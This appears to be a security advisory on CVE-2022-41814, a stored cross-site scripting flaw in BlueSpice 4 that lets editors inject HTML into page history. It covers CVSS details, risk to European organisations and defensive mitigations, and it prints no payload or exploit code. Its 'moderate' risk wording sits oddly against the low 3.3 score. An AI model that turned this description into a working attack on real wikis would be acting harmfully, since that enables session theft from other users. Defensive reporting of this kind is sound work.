CVE-2022-41814 is a Cross-site Scripting (XSS) vulnerability identified in the BlueSpiceFoundation extension of BlueSpice, a wiki software product developed by Hallo Welt! GmbH. The vulnerability affects version 4 of BlueSpice. Specifically, this flaw allows a user who has a regular account with edit permissions to inject arbitrary HTML content into the history view of a wiki page. This injection occurs because the application does not properly sanitize or encode user-supplied input before rendering it in the history view, which is accessible to other users. The vulnerability is classified under CWE-79, indicating improper neutralization of input during web page generation. The CVSS 3.1 base score is 3.3, reflecting a low severity level. The vector indicates that the attack requires local access (AV:L), low attack complexity (AC:L), privileges (PR:L), no user interaction (UI:N), and impacts confidentiality only (C:L), with no impact on integrity or availability. No known exploits have been reported in the wild, and no official patches or mitigation links are provided in the source information. The vulnerability was published on November 15, 2022, and was reserved on October 7, 2022. The flaw could allow an attacker with edit permissions to execute HTML-based attacks such as session hijacking or phishing within the context of the wiki application, potentially exposing sensitive information to unauthorized parties viewing the history page.

For European organizations using BlueSpice version 4, this vulnerability poses a moderate confidentiality risk. Since the flaw allows injection of arbitrary HTML into the history view, an attacker with edit permissions could craft malicious payloads that execute in the browsers of users viewing the page history. This could lead to theft of session cookies, unauthorized actions performed on behalf of users, or exposure of sensitive internal wiki information. However, the requirement for the attacker to have edit permissions limits the scope to insider threats or compromised accounts. The lack of impact on integrity and availability reduces the risk of data tampering or service disruption. Organizations relying on BlueSpice for internal documentation, knowledge management, or collaboration could face reputational damage and potential data leakage if this vulnerability is exploited. Given that BlueSpice is used by various enterprises and public sector entities in Europe, especially in Germany where the vendor is based, the risk is more pronounced in organizations with less stringent user access controls or monitoring. The absence of known exploits in the wild suggests limited active threat but does not preclude targeted attacks.

Restrict edit permissions strictly to trusted users and regularly audit user roles to minimize the number of accounts capable of injecting content. Implement additional input validation and output encoding on the history view rendering to neutralize any injected HTML or scripts, even if the vendor has not yet released a patch. Monitor wiki page history views for unusual or suspicious HTML content that could indicate attempted exploitation. Educate users with edit permissions about the risks of injecting untrusted content and enforce policies against misuse. Consider deploying web application firewalls (WAFs) with custom rules to detect and block suspicious HTML payloads in requests related to wiki edits or history views. If feasible, upgrade to a newer version of BlueSpice once a patch addressing this vulnerability is released, or apply vendor-provided security updates promptly. Implement Content Security Policy (CSP) headers to restrict the execution of inline scripts or untrusted content within the wiki application context.